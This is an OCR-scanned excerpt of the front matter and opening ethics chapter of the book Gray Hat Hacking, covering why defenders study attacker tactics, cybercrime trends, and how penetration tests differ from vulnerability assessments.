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PREFACE 



This book has been developed by and for security professionals who are dedicated to 
working in an ethical and responsible manner to improve the overall security posture 
of individuals, corporations, and nations. 



XXI 





ACKNOWLEDGMENTS 



Each of the authors would like to thank the editors at McGraw-Hill. In particular, we 
would like to thank Joya Anthony. You really kept us on track and helped us through 
the process. Your dedication to this project was truly noteworthy. Thanks. 

Allen Harper would like to thank his wonderful wife, Corann, and daughters, 
Haley and Madison, for their support and understanding through this third edition. It 
is wonderful to see our family grow stronger in Christ. I love you each dearly. In addi- 
tion, Allen would like to thank the members of his Church for their love and support. 
In particular, Rob Martin and Ronnie Jones have been true brothers in the Lord and 
great friends. Also, Allen would like to thank other hackers who provided assistance 
through the process: Alex Sotirov, Mark Dowd, Alexey Sintsov, Shuichiro Suzuki, Peter 
Van Eeckhoutte, Stefan Le Berre, and Damien Cauquil. 

Shon Harris would like to thank the other authors and the team members for their 
continued dedication to this project and continual contributions to the industry as a 
whole. Shon would also like to thank the crazy Fairbairn sisters — Kathy Conlon, Diane 
Marshall, and Kristy Gorenz for their lifelong support of Shon and her efforts. 

Jonathan Ness would like to thank Jessica, his amazing wife, for tolerating the long 
hours required for him to write this book (and hold his job, and his second job, and 
third "job," and all the side projects). Thanks also to Didier Stevens for the generous 
help with Chapter 16 (and for providing the free PDF analysis tools at http://blog 
.didierstevens.com/programs/pdf-tools). Big thanks also to Terry McCorkle for his 
expert guidance and advice, which led to the current Chapter 17 — you're a life-saver, 
Terry! Finally, Jonathan would like to thank the mentors, teachers, coworkers, pastors, 
family, and friends who have guided him along his way, contributing more to his suc- 
cess than they'll ever know. 

Chris Eagle would like to acknowledge all of the core members of the DDTEK 
crew. The hard work they put in and the skills they bring to the table never cease to 
amaze him. 

Gideon Lenkey would like to thank his loving and supportive family and friends 
who patiently tolerate his eccentric pursuits. He'd also like to thank all of the special 
agents of the FBI, present and retired, who have kept boredom from his door! 

Terron Williams would like to thank his lovely wife, Mekka, and his stepson, Christian 
Morris. The two of you are the center of my life, and I appreciate each and every second 
that we share together. God is truly good all of the time. In addition, Terron would like 
to thank his mother, Christina Williams, and his sister, Sharon Williams-Scott. There is 
not a moment that goes by that I am not grateful for the love and the support that you 
have always shown to me. 



https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 





INTRODUCTION 



I have seen enough of one war never to wish to see another. 

— Thomas Jefferson 

I know not with what weapons World War III will be fought, but World War IV will be 

fought with sticks and stones. 

— Albert Einstein 

The art of war is simple enough. Find out where your enemy is. Get at him as soon as you 

can. Strike him as hard as you can, and keep moving on. 

— Ulysses S. Grant 

The goal of this book is to help produce more highly skilled security professionals 
who are dedicated to protecting against malicious hacking activity. It has been proven 
over and over again that it is important to understand one's enemies, including their 
tactics, skills, tools, and motivations. Corporations and nations have enemies that are 
very dedicated and talented. We must work together to understand the enemies' pro- 
cesses and procedures to ensure that we can properly thwart their destructive and mali- 
cious behavior. 

The authors of this book want to provide the readers with something we believe the 
industry needs: a holistic review of ethical hacking that is responsible and truly ethical 
in its intentions and material. This is why we are starting this book with a clear defini- 
tion of what ethical hacking is and is not — something society is very confused about. 

We have updated the material from the first and second editions and have attempted 
to deliver the most comprehensive and up-to-date assembly of techniques, procedures, 
and material. Nine new chapters are presented and the other chapters have been 
updated. 

In Part I of this book we lay down the groundwork of the necessary ethics and ex- 
pectations of a gray hat hacker. This section: 

• Clears up the confusion about white, black, and gray hat definitions and 
characteristics 

• Reviews the slippery ethical issues that should be understood before carrying 
out any type of ethical hacking activities 

• Reviews vulnerability discovery reporting challenges and the models that can 
be used to deal with those challenges 

• Surveys legal issues surrounding hacking and many other types of malicious 
activities 

• Walks through proper vulnerability discovery processes and current models 
that provide direction 

In Part II, we introduce more advanced penetration methods and tools that no other 
books cover today. Many existing books cover the same old tools and methods that have 
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been rehashed numerous times, but we have chosen to go deeper into the advanced mech- 
anisms that real gray hats use today. We discuss the following topics in this section: 

• Automated penetration testing methods and advanced tools used to carry out 
these activities 

• The latest tools used for penetration testing 

• Physical, social engineering, and insider attacks 

In Part III, we dive right into the underlying code and teach the reader how specific 
components of every operating system and application work, and how they can be ex- 
ploited. We cover the following topics in this section: 

• Program Coding 101 to introduce you to the concepts you will need to 
understand for the rest of the sections 

• How to exploit stack operations and identify and write buffer overflows 

• How to identify advanced Linux and Windows vulnerabilities and how they 
are exploited 

• How to create different types of shellcode to develop your own proof-of- 
concept exploits and necessary software to test and identify vulnerabilities 

• The latest types of attacks, including client-based, web server, VoIP, and 
SCADA attacks 

In Part IV, we go even deeper, by examining the most advanced topics in ethical 
hacking that many security professionals today do not understand. In this section, we 
examine the following: 

• Passive and active analysis tools and methods 

• How to identify vulnerabilities in source code and binary files 

• How to reverse-engineer software and disassemble the components 

• Fuzzing and debugging techniques 

• Mitigation steps of patching binary and source code 

In Part V, we have provided a section on malware analysis. At some time or another, 
the ethical hacker will come across a piece of malware and may need to perform basic 
analysis. In this section, you will learn about the following topics: 

• Collection of your own malware specimen 

• Analysis of malware, including a discussion of de-obfuscation techniques 

If you are ready to take the next step to advance and deepen your understanding of 
ethical hacking, this is the book for you. 

We're interested in your thoughts and comments. Please send us an e-mail at 
book@grayhathackingbook.com. Also, for additional technical information and re- 
sources related to this book and ethical hacking, browse to www.grayhathackingbook 
.com or www.mhprofessional.com/product.php?cat=112&isbn=0071742557. 
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CHAPTER 



Ethics of Ethical Hacking 



This book has not been compiled and written to be used as a tool by individuals who 
wish to carry out malicious and destructive activities. It is a tool for people who are 
interested in extending or perfecting their skills to defend against such attacks and dam- 
aging acts. In this chapter, we'll discuss the following topics: 



• Why you need to understand your enemy's tactics 

• Recognizing the gray areas in security 

• How does this stuff relate to an ethical hacking book? 

• The controversy of hacking books and classes 

• Where do attackers have most of their fun? 

Why You Need to Understand 
Your Enemy’s Tactics 

Let's go ahead and get the commonly asked questions out of the way and move on from 
there. 

Was this book ivritten to teach today's hackers how to cause damage in more effective ways ? 
Answer: No. Next question. 

Then why in the world would you try to teach people how to cause destruction and mayhem? 
Answer: You cannot properly protect yourself from threats you do not understand. 
The goal is to identify and prevent destruction and mayhem, not cause it. 

I don't believe you. I think these books are only written for profits and royalties. 

Answer: This book was written to actually teach security professionals what the 
bad guys already know and are doing. More royalties would be nice, too, so please 
buy two copies. 

Still not convinced? Why do militaries all over the world study their enemies' tac- 
tics, tools, strategies, technologies, and so forth? Because the more you know about 
what your enemy is up to, the better idea you have as to what protection mechanisms 
you need to put into place to defend yourself. 
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Most countries' militaries carry out various scenario-based fighting exercises. For ex- 
ample, pilot units split up into the "good guys" and the "bad guys." The bad guys use the 
same tactics, techniques, and methods of fighting as a specific enemy — Libya, Russia, 
United States, Germany, North Korea, and so on. The goal of these exercises is to allow 
the pilots to understand enemy attack patterns and to identify and be prepared for cer- 
tain offensive actions, so they can properly react in the correct defensive manner. 

This may seem like a large leap — from pilots practicing for wartime to corporations 
trying to practice proper information security — but it is all about what the team is try- 
ing to protect and the risks involved. 

A military is trying to protect its nation and its assets. Many governments around 
the world have also come to understand that the same assets they have spent millions 
and perhaps billions of dollars to protect physically now face different types of threats. 
The tanks, planes, and weaponry still have to be protected from being blown up, but 
these same tanks, planes, and weaponry are now all run by and are dependent upon 
software. This software can be hacked into, compromised, or corrupted. Coordinates of 
where bombs are to be dropped can be changed. Individual military bases still need to 
be protected by surveillance and military police; this is physical security. Satellites and 
airplanes perform surveillance to watch for suspicious activities taking place from afar, 
and security police monitor the entry points in and out of the base. These types of con- 
trols are limited in monitoring all of the entry points into a military base. Because the 
base is so dependent upon technology and software — as every organization is today — 
and there are now so many communication channels present (Internet, extranets, wire- 
less, leased lines, shared WAN lines, and so on), a different type of "security police" is 
required to cover and monitor all of these entry points into and out of the base. 

Okay, so your corporation does not hold top security information about the tactical 
military troop movement through Afghanistan, you don't have the speculative coordi- 
nates of the location of bin Laden, and you are not protecting the launch codes of nu- 
clear bombs — does that mean you do not need to have the same concerns and 
countermeasures? Nope. Just as the military needs to protect its assets, you need to 
protect yours. 

An interesting aspect of the hacker community is that it is changing. Over the last 
few years, their motivation has changed from just the thrill of figuring out how to ex- 
ploit vulnerabilities to figuring out how to make revenue from their actions and getting 
paid for their skills. Hackers who were out to "have fun" without any real target in mind 
have, to a great extent, been replaced by people who are serious about gaining financial 
benefits from their activities. Attacks are not only getting more specific, but also in- 
creasing in sophistication. The following are just a few examples of this type of trend: 

• One of three Indian defendants was sentenced in September 2008 for an 
online brokerage hack, called one of the first federal prosecutions of a "hack, 
pump, and dump" scheme, in which hackers penetrate online brokerage 
accounts, buy large shares of penny stocks to inflate the price, and then net 
the profits after selling shares. 

• In December 2009, a Russian hacking group called the Russian Business 
Network (BSN) stole tens of millions of dollars from Citibank through the 
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use of a piece of malware called "Black Energy." According to Symantec, about 
half of all phishing incidents in 2008 were credited to the RBN. 

• A group of Russian, Estonian, and Moldovan hackers were indicted in 
November 2009, after stealing more than $9 million from a credit card 
processor in one day. The hackers were alleged to have broken the encryption 
scheme used at Royal Bank of Scotland's payment processor, and then they 
raised account limits, created and distributed counterfeit debit cards, and 
withdrew roughly $9.4 million from more than 2,100 ATMs worldwide — in 
less than 12 hours. 

• Hackers using a new kind of malware made off with at least 300,000 Euros 
from German banks in August of 2009. The malware wrote new bank 
statements as it took money from victims' bank accounts, changing HTML 
coding on an infected machine before a user could see it. 

Criminals are also using online scams in a bid to steal donations made to help 
those affected by the January 2010 earthquake in Haiti and other similar disasters. 
Fraudsters have set up fictitious websites or are falsely using the names of genuine 
charities to trick donors into sending them donations. If you can think of the crime, it 
is probably already taking place within the digital world. You can learn more about 
these types of crimes at www.cybercrime.gov. 

Malware is still one of the main culprits that costs companies the most amount of 
money. An interesting thing about malware is that many people seem to put it in a dif- 
ferent category from hacking and intrusions. The fact is malware has evolved to become 
one of the most sophisticated and automated forms of hacking. The attacker only has 
to put some upfront effort into developing the software, and then with no more effort 
required from the attacker, the malware can do its damage over and over again. The 
commands and logic within the malware are the same components that attackers used 
to have to carry out manually. 

Sadly, many of us have a false sense of security when it comes to malware detection. 
In 2006, Australia's CERT announced that 80 percent of antivirus software products 
commonly missed new malware attacks because attackers test their malware software 
against the most popular antivirus software products in the industry to hide from detec- 
tion. If you compare this type of statistic with the amount of malware that hits the In- 
ternet hourly, you can get a sense of the level of vulnerability we are actually faced with. 
In 2008, Symantec had to write new virus signatures every 20 seconds to keep up with 
the onslaught of malware that was released. This increased to every 8 seconds by 2009. 
As of this writing, close to 4 million malware signatures are required for antivirus soft- 
ware to be up to date. 

The company Alinean has put together the cost estimates, per minute, for different 
organizations if their operations are interrupted. Even if an attack or compromise is not 
totally successful for the attacker (he or she does not obtain the desired asset), this in 
no way means that the company remains unharmed. Many times attacks and intrusions 
cause more of a nuisance and can negatively affect production and the normal depart- 
ment operations, which always correlates to costing the company more money in direct 
or indirect ways. These costs are shown in Table 1-1. 
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Business Application 


Estimated Outage Cost per Minute 


Supply chain management 


$1 1,000 


E-commerce 


$10,000 


Customer service 


$3,700 


ATM/POS/EFT 


$3,500 


Financial management 


$1,500 


Human capital management 


$1,000 


Messaging 


$1,000 


Infrastructure 


$700 



Table l-l Downtime Losses (Source: Alinean) 



A conservative estimate from Gartner pegs the average hourly cost of downtime for 
computer networks at $42,000. A company that suffers from worse than average down- 
time of 1 75 hours a year can lose more than $7 million per year. Even when attacks are 
not newsworthy enough to be reported on TV or talked about in security industry cir- 
cles, they still negatively affect companies' bottom lines. 

As stated earlier, an interesting shift has taken place in the hacker community, from 
joy riding to hacking as an occupation. Today, potentially millions of computers are 
infected with bots that are controlled by specific hackers. If a hacker has infected 10,000 
systems, this is her botnet, and she can use it to carry out DDoS attacks or even lease 
these systems to others who do not want their activities linked to their true identities or 
systems. ( Botnets are commonly used to spread spam, phishing attacks, and pornogra- 
phy.) The hacker who owns and runs a botnet is referred to as a hot herder. Since more 
network administrators have configured their mail relays properly and blacklists have 
been employed to block mail relays that are open, spammers have had to change tactics 
(using botnets), which the hacking community has been more than willing to pro- 
vide — for a price. 

For example, the Zeus bot variant uses key-logging techniques to steal sensitive data 
such as usernames, passwords, account numbers, and credit card numbers. It injects 
fake HTML forms into online banking login pages to steal user data. Its botnet is esti- 
mated to consist of 3.6 million compromised computers. Zeus's creators are linked to 
about $100 million in fraud in 2009 alone. Another botnet, the Koobface, is one of the 
most efficient social engineering-driven botnets to date. It spreads via social network- 
ing sites MySpace and Facebook with faked messages or comments from "friends." 
When a user clicks a provided link to view a video, the user is prompted to obtain a 
necessary software update, like a CODEC — but the update is really malware that can 
take control of the computer. By early 2010, 2.9 million computers have knowingly 
been compromised. Of course, today many more computers have been compromised 
than has been reported. 
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Security Compromises and Trends 

The following are a few specific examples and trends of security compromises 
that are taking place today: 

• A massive joint operation between U.S. and Egyptian law enforcement, 
called "Operation Phish Pry" netted 100 accused defendants. The two- 
year investigation led to the October 2009 indictment of both American 
and Egyptian hackers who allegedly worked in both countries to hack 
into American bank systems, after using phishing lures to collect 
individual bank account information. 

• Social networking site Twitter was the target of several attacks in 2009, 
one of which shut service down for more than 30 million users. The 
DoS attack that shut the site down also interrupted access to Facebook 
and Linkedln, affecting approximately 300 million users in total. 

• Attackers maintaining the Zeus botnet broke into Amazon's EC2 
cloud computing service in December 2009, even after Amazon's 
service had received praise for its safety and performance. The vims 
that was used acquired authentication credentials from an infected 
computer, accessed one of the websites hosted on an Amazon server, 
and connected to the Amazon cloud to install a command and control 
infrastructure on the client grid. The high-performance platform let the 
virus quickly broadcast commands across the network. 

• In December 2009, a hacker posted an online-banking phishing 
application in the open source, mobile phone operating system 
Android. The fake software showed up in the application store, used 
by a variety of phone companies, including Google's Nexus One 
phone. Once users downloaded the software, they entered personal 
information into the application, which was designed to look like it 
came from specific credit unions. 

• Iraqi insurgents intercepted live video feeds from U.S. Predator drones 
in 2008 and 2009. Shiite fighters attacked some nonsecure links in 
drone systems, allowing them to see where U.S. surveillance was taking 
place and other military operations. It is reported that the hackers used 
cheap software available online to break into the drones' systems. 

• In early 2010, Google announced it was considering pulling its search 
engine from China, in part because of rampant China-based hacker 
attacks, which used malware and phishing to penetrate the Gmail 
accounts of human rights activists. 
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Some hackers also create and sell zero-day attacks. A zero-day attack is one for which 
there is currently no fix available and whoever is running the particular software that 
contains that exploitable vulnerability is exposed with little or no protection. The code 
for these types of attacks are advertised on special websites and sold to other hackers or 
organized crime rings. 

References 
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Computer Crime & Intellectual Property Section, United States Department of 
Justice www.cybercrime.gov 

Federal Trade Commission, Identity Theft Site http://www.ftc.gov/bcp/edu/ 
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Recognizing the Gray Areas in Security 

Since technology can be used by the good and bad guys, there is always a fine line that 
separates the two. For example, BitTorrent is a peer-to-peer file sharing protocol that al- 
lows individuals all over the world to share files whether they are the legal owners or 
not. One website will have the metadata of the files that are being offered up, but in- 
stead of the files being available on that site's web farm, the files are located on the 
user's system who is offering up the files. This distributed approach ensures that one 
web server farm is not overwhelmed with file requests, but it also makes it harder to 
track down those who are offering up illegal material. 

Various publishers and owners of copyrighted material have used legal means to 
persuade sites that maintain such material to honor the copyrights. The fine line is that 
sites that use the BitTorrent protocol are like windows for all the material others are 
offering to the world; they don't actually host this material on their physical servers. So 
are they legally responsible for offering and spreading illegal content? 

The entities that offer up files to be shared on a peer-to-peer sharing site are referred 
to as BitTorrent trackers. Organizations such as Suprnova.org, TorrentSpy, LokiTorrent, 
and Mininova are some of the BitTorrent trackers that have been sued and brought off- 
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line for their illegal distribution of copyrighted material. The problem is that many of 
these entities just pop up on some other BitTorrent site a few days later. BitTorrent is a 
common example of a technology that can be used for good and evil purposes. 

Another common gray area in web-based technology is search engine optimization 
(SEO). Today, all organizations and individuals want to be at the top of each search 
engine result to get as much exposure as possible. Many simple to sophisticated ways 
are available for carrying out the necessary tasks to climb to the top. The proper meth- 
ods are to release metadata that directly relates to content on your site, update your 
content regularly, and create legal links and backlinks to other sites, etc. But, for every 
legitimate way of working with search engine algorithms, there are ten illegitimate 
ways. Spamdexing offers a long list of ways to fool search engines into getting a specific 
site up the ladder in a search engine listing. Then there's keyword stuffing, in which a 
malicious hacker or "black hat" will place hidden text within a page. For example, if 
Bob has a website that carries out a phishing attack, he might insert hidden text within 
his page that targets elderly people to help drive these types of victims to his site. 

There are scraper sites that take ( scrape ) content from another website without au- 
thorization. The malicious site will make this stolen content unique enough that it 
shows up as new content on the Web, thus fooling the search engine into giving it a 
higher ranking. These sites commonly contain mostly advertisements and links back to 
the original sites. 

There are several other ways of manipulating search engine algorithms as well, for 
instance, creating link farms, hidden links, fake blogs, page hijacking, and so on. The 
crux here is that some of these activities are the right way of doing things and some of 
them are the wrong way of doing things. Our laws have not necessarily caught up with 
defining what is legal and illegal all the way down to SEO algorithm activities. 




NOTE We go into laws and legal issues pertaining to various hacking 
activities in Chapter 2. 



There are multiple instances of the controversial concept of hactivism. Both legal 
and illegal methods can be used to portray political ideology. Is it right to try and influ- 
ence social change through the use of technology? Is web defacement covered under 
freedom of speech? Is it wrong to carry out a virtual "sit in" on a site that provides il- 
legal content? During the 2009 Iran elections, was it unethical for an individual to set 
up a site that showed upheaval about the potential corrupt government elections? 
When Israeli invaded Gaza, there were many website defacements, DoS attacks, and 
website highjackings. The claim of what is ethical versus not ethical probably depends 
upon which side the individuals making these calls reside. 
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How Does This Stuff Relate to an 
Ethical Hacking Book? 

Corporations and individuals need to understand how the damage is being done so 
they understand how to stop it. Corporations also need to understand the extent of the 
threat that a vulnerability represents. Let's take a very simplistic example. The company 
FalseSenseOfSecurity, Inc., may allow its employees to share directories, fdes, and whole 
hard drives. This is done so that others can quickly and easily access data as needed. The 
company may understand that this practice could possibly put the fdes and systems at 
risk, but they only allow employees to have unclassified files on their computers, so the 
company is not overly concerned. The real security threat, which is something that 
should be uncovered by an ethical hacker, is if an attacker can use this file-sharing ser- 
vice as access into a computer itself. Once this computer is compromised, the attacker 
will most likely plant a backdoor and work on accessing another, more critical system 
via the compromised system. 

The vast amount of functionality that is provided by an organization's networking, 
database, and desktop software can be used against them. Within each and every orga- 
nization, there is the all-too-familiar battle of functionality vs. security. This is the rea- 
son that, in most environments, the security officer is not the most well-liked 
individual in the company. Security officers are in charge of ensuring the overall secu- 
rity of the environment, which usually means reducing or shutting off many function- 
alities that users love. Telling people that they cannot access social media sites, open 
attachments, use applets or JavaScript via e-mail, or plug in their mobile devices to a 
network-connected system and making them attend security awareness training does 
not usually get you invited to the Friday night get-togethers at the bar. Instead, these 
people are often called "Security Nazi" or "Mr. No" behind their backs. They are re- 
sponsible for the balance between functionality and security within the company, and 
it is a hard job. 

The ethical hacker's job is to find these things running on systems and networks, 
and he needs to have the skill set to know how an enemy would use these things against 
the organization. This work is referred to as a penetration test, which is different from 
a vulnerability assessment, which we'll discuss first. 



Vulnerability Assessment 

A vulnerability assessment is usually carried out by a network scanner on steroids. Some 
type of automated scanning product is used to probe the ports and services on a range 
of IP addresses. Most of these products can also test for the type of operating system 
and application software running and the versions, patch levels, user accounts, and 
services that are also running. These findings are matched up with correlating vulnera- 
bilities in the product's database. The end result is a large pile of reports that provides a 
list of each system's vulnerabilities and corresponding countermeasures to mitigate the 
associated risks. Basically, the tool states, "Here is a list of your vulnerabilities and here 
is a list of things you need to do to fix them." 
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To the novice, this sounds like an open and shut case and an easy stroll into net- 
work utopia where all of the scary entities can be kept out. This false utopia, unfortu- 
nately, is created by not understanding the complexity of information security. The 
problem with just depending upon this large pile of printouts is that it was generated 
by an automated tool that has a hard time putting its findings into the proper context 
of the given environment. For example, several of these tools provide an alert of "ffigh" 
for vulnerabilities that do not have a highly probable threat associated with them. The 
tools also cannot understand how a small, seemingly insignificant, vulnerability can be 
used in a large orchestrated attack. 

Vulnerability assessments are great for identifying the foundational security issues 
within an environment, but many times, it takes an ethical hacker to really test and 
qualify the level of risk specific vulnerabilities pose. 

Penetration Testing 

A penetration test is when ethical hackers do their magic. They can test many of the vul- 
nerabilities identified during the vulnerability assessment to quantify the actual threat 
and risk posed by the vulnerability. 

When ethical hackers are carrying out a penetration test, their ultimate goal is usu- 
ally to break into a system and hop from system to system until they "own" the domain 
or environment. They own the domain or environment when they either have root 
privileges on the most critical Unix or Linux system or own the domain administrator 
account that can access and control all of the resources on the network. They do this to 
show the customer (company) what an actual attacker can do under the circumstances 
and current security posture of the network. 

Many times, while the ethical hacker is carrying out her procedures to gain total 
control of the network, she will pick up significant trophies along the way. These tro- 
phies can include the CEO's passwords, company trade-secret documentation, admin- 
istrative passwords to all border routers, documents marked "confidential" held on the 
CFO's and CIO's laptops, or the combination to the company vault. The reason these 
trophies are collected along the way is so the decision makers understand the ramifica- 
tions of these vulnerabilities. A security professional can go on for hours to the CEO, 
CIO, or COO about services, open ports, misconfigurations, and hacker potential with- 
out making a point that this audience would understand or care about. But as soon as 
you show the CFO his next year's projections, or show the CIO all of the blueprints to 
the next year's product line, or tell the CEO that his password is "IAmWearingPanties," 
they will all want to learn more about the importance of a firewall and other counter- 
measures that should be put into place. 




CAUTION No security professional should ever try to embarrass a customer 
or make them feel inadequate for their lack of security.This is why the security 
professional has been invited into the environment. He is a guest and is there 
to help solve the problem, not point fingers. Also, in most cases, any sensitive 
data should not be read by the penetration team because of the possibilities 
of future lawsuits pertaining to the use of confidential information. 
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The goal of a vulnerability test is to provide a listing of all of the vulnerabilities 
within a network. The goal of a penetration test is to show the company how these 
vulnerabilities can be used against it by attackers. From here, the security professional 
(ethical hacker) provides advice on the necessary countermeasures that should be im- 
plemented to reduce the threats of these vulnerabilities individually and collectively. In 
this book, we will cover advanced vulnerability tools and methods as well as sophisti- 
cated penetration techniques. Then we'll dig into the programming code to show you 
how skilled attackers identify vulnerabilities and develop new tools to exploit their 
findings. 

Let's take a look at the ethical penetration testing process and see how it differs from 
that of unethical hacker activities. 

The Penetration Testing Process 

1. Form two or three teams: 

• Red team — The attack team 

• White team — Network administration, the victim 

• Blue team — Management coordinating and overseeing the test (optional) 

2. Establish the ground rules: 

• Testing objectives 

• What to attack, what is hands-off 

• Who knows what about the other team (Are both teams aware of the other? 
Is the testing single blind or double blind?) 

• Start and stop dates 

• Legal issues 

• Just because a client asks for it, doesn't mean that it's legal. 

• The ethical hacker must know the relevant local, state, and federal laws 
and how they pertain to testing procedures. 

• Confidentiality/Nondisclosure 

• Reporting requirements 

• Formalized approval and written agreement with signatures and contact 
information 

• Keep this document handy during the testing. It may be needed as a 
"get out of jail free" card 

Penetration Testing Activities 

3. Passive scanning Gather as much information about the target as possible 
while maintaining zero contact between the penetration tester and the target. 
Passive scanning can include interrogating: 
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• The company's website and source code 

• Social networking sites 

• Whois database 

• Edgar database 

• Newsgroups 

• ARIN, RIPE, APNIC, LACNIC databases 

• Google, Monster.com, etc. 

• Dumpster diving 

4. Active scanning Probe the target's public exposure with scanning tools, 
which might include: 

• Commercial scanning tools 

• Banner grabbing 

• Social engineering 

• War dialing 

• DNS zone transfers 

• Sniffing traffic 

• Wireless war driving 

5. Attack surface enumeration Probe the target network to identify, 
enumerate, and document each exposed device: 

• Network mapping 

• Router and switch locations 

• Perimeter firewalls 

• LAN, MAN, and WAN connections 

6. Fingerprinting Perform a thorough probe of the target systems to identify: 

• Operating system type and patch level 

• Applications and patch level 

• Open ports 

• Running services 

• User accounts 

7. Target system selection Identify the most useful target(s). 

8. Exploiting the uncovered vulnerabilities Execute the appropriate attack 
tools targeted at the suspected exposures. 

• Some may not work. 

• Some may kill services or even kill the server. 

• Some may be successful. 
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9. Escalation of privilege Escalate the security context so the ethical hacker has 
more control. 

• Gaining root or administrative rights 

• Using cracked password for unauthorized access 

• Carrying out buffer overflow to gain local versus remote control 

10. Documentation and reporting Document everything found, how it was 
found, the tools that were used, vulnerabilities that were exploited, the 
timeline of activities, and successes, etc. 




NOTE A more detailed approach to penetration methodology is presented 
in Chapter 5. 



What Would an Unethical Hacker Do Differently? 



1. Target selection 

• Motivations would be due to a grudge or for fun or profit. 

• There are no ground rules, no hands-off targets, and the white team is 
definitely blind to the upcoming attack. 

2. Intermediaries 

• The attacker launches his attack from a different system (intermediary) than 
his own to make tracking back to him more difficult in case the attack is 
detected. 

• There may be several layers of intermediaries between the attacker and the 
victim. 

• Intermediaries are often victims of the attacker as well. 

3. Next the attacker will proceed with penetration testing steps described 

previously. 

• Passive scanning 

• Active scanning 

• Footprinting 

• Target system selection 

• Fingerprinting 

• Exploiting the uncovered vulnerabilities 

• Escalation of privilege 

4. Preserving access 

• This involves uploading and installing a rootkit, backdoor, Trojan'ed 
applications, and/or hots to assure that the attacker can regain access at 
a later time. 
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5. Covering his tracks 

• Scrubbing event and audit logs 

• Hiding uploaded files 

• Hiding the active processes that allow the attacker to regain access 

• Disabling messages to security software and system logs to hide malicious 
processes and actions 

6. Hardening the system 

• After taking ownership of a system, an attacker may fix the open 
vulnerabilities so no other attacker can use the system for other purposes. 

How the attacker uses the compromised systems depends upon what his overall 
goals are, which could include stealing sensitive information, redirecting financial 
transactions, adding the systems to his hot network, extorting a company, etc. 

The crux is that ethical and unethical hackers carry out basically the same activities 
only with different intentions. If the ethical hacker does not identify the hole in the 
defenses first, the unethical hacker will surely slip in and make himself at home. 

The Controversy of Hacking Books and Classes 

When books on hacking first came out, a big controversy arose pertaining to whether 
this was the right thing to do or not. One side said that such books only increased 
the attackers' skills and techniques and created new attackers. The other side stated 
that the attackers already had these skills, and these books were written to bring the 
security professionals and networking individuals up to speed. Who was right? They 
both were. 

The word "hacking" is sexy, exciting, seemingly seedy, and usually brings about 
thoughts of complex technical activities, sophisticated crimes, and a look into the face 
of electronic danger itself. Although some computer crimes may take on some of these 
aspects, in reality it is not this grand or romantic. A computer is just a new tool to carry 
out old crimes. 

Attackers are only one component of information security. Unfortunately, when 
most people think of security, their minds go right to packets, firewalls, and hackers. 
Security is a much larger and more complex beast than these technical items. Real secu- 
rity includes policies and procedures, liabilities and laws, human behavior patterns, 
corporate security programs and implementation, and yes, the technical aspects — fire- 
walls, intrusion detection systems, proxies, encryption, antivirus software, hacks, cracks, 
and attacks. 

Understanding how different types of hacking tools are used and how certain at- 
tacks are carried out is just one piece of the puzzle. But like all pieces of a puzzle, it is a 
very important one. For example, if a network administrator implements a packet filter- 
ing firewall and sets up the necessary configurations, he may feel the company is now 
safe and sound. He has configured his access control lists to allow only "established" 
traffic into the network. This means an outside source cannot send a SYN packet to 
initiate communication with an inside system. If the administrator does not realize that 
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there are tools that allow for ACK packets to be generated and sent, he is only seeing 
part of the picture here. This lack of knowledge and experience allows for a false sense 
of security, which seems to be pretty common in companies around the world today. 

Let's look at another example. A network engineer configures a firewall to review 
only the first fragment of a packet and not the packet fragments that follow. The engi- 
neer knows that this type of "cut through" configuration will increase network perfor- 
mance. But if she is not aware that there are tools that can create fragments with 
dangerous payloads, she could be allowing in malicious traffic. Once these fragments 
reach the inside destination system and are reassembled, the packet can be put back 
together and initiate an attack. 

In addition, if a company's employees are not aware of social engineering attacks 
and how damaging they can be, they may happily give out useful information to attack- 
ers. This information is then used to generate even more powerful and dangerous at- 
tacks against the company. Knowledge and the implementation of knowledge are the 
keys for any real security to be accomplished. 

So where do we stand on hacking books and hacking classes? Directly on top of a 
slippery banana peel. There are currently three prongs to the problem of today's hack- 
ing classes and books. First, marketing people love to use the word "hacking" instead of 
more meaningful and responsible labels such as "penetration methodology." This 
means that too many things fall under the umbrella of hacking. All of these procedures 
now take on the negative connotation that the word "hacking" has come to be associ- 
ated with. Second is the educational piece of the difference between hacking and ethi- 
cal hacking, and the necessity of ethical hacking (penetration testing) in the security 
industry. The third issue has to do with the irresponsibility of many hacking books and 
classes. If these items are really being developed to help out the good guys, then they 
should be developed and structured to do more than just show how to exploit a vulner- 
ability. These educational components should show the necessary countermeasures 
required to fight against these types of attacks and how to implement preventive mea- 
sures to help ensure these vulnerabilities are not exploited. Many books and courses 
tout the message of being a resource for the white hat and security professional. If you 
are writing a book or curriculum for black hats, then just admit it. You will make just as 
much (or more) money, and you will help eliminate the confusion between the con- 
cepts of hacking and ethical hacking. 

The Dual Nature of Tools 

In most instances, the toolset used by malicious attackers is the same toolset used by 
security professionals. A lot of people do not seem to understand this. In fact, the 
books, classes, articles, websites, and seminars on hacking could be legitimately re- 
named to "security professional toolset education." The problem is that marketing 
people like to use the word "hacking" because it draws more attention and paying cus- 
tomers. 

As covered earlier, ethical hackers go through the same processes and procedures as 
unethical hackers, so it only makes sense that they use the same basic toolset. It would 
not be useful to prove that attackers could not get through the security barriers with 
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Tool A if attackers do not use Tool A. The ethical hacker has to know what the bad guys 
are using, know the new exploits that are out in the underground, and continually keep 
her skills and knowledgebase up to date. Why? Because the odds are against the com- 
pany and against the security professional. The security professional has to identify and 
address all of the vulnerabilities in an environment. The attacker only has to be really 
good at one or two exploits, or really lucky. A comparison can be made to the U.S. 
Homeland Security responsibilities. The CIA and FBI are responsible for protecting the 
nation from the 10 million things terrorists could possibly think up and carry out. The 
terrorist only has to be successful at one of these 10 million things. 

How Are These Tools Used for Good Instead of Evil? 

How would a company's networking staff ensure that all of the employees are creating 
complex passwords that meet the company's password policy? They can set operating 
system configurations to make sure the passwords are of a certain length, contain up- 
per- and lowercase letters, contain numeric values, and keep a password history. But 
these configurations cannot check for dictionary words or calculate how much protec- 
tion is being provided from brute-force attacks. So the team can use a hacking tool to 
carry out dictionary and brute-force attacks on individual passwords to actually test 
their strength, as illustrated in Figure 1-1. The other choice is to go to each and every 
employee and ask what his or her password is, write down the password, and eyeball it 
to determine if it is good enough. Not a good alternative. 
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The same network staff needs to make sure that their firewall and router configura- 
tions will actually provide the protection level that the company requires. They could 
read the manuals, make the configuration changes, implement ACLs, and then go and 
get some coffee. Or they could implement the configurations and then run tests against 
these settings to see if they are allowing malicious traffic into what they thought was a 
controlled environment. These tests often require the use of hacking tools. The tools 
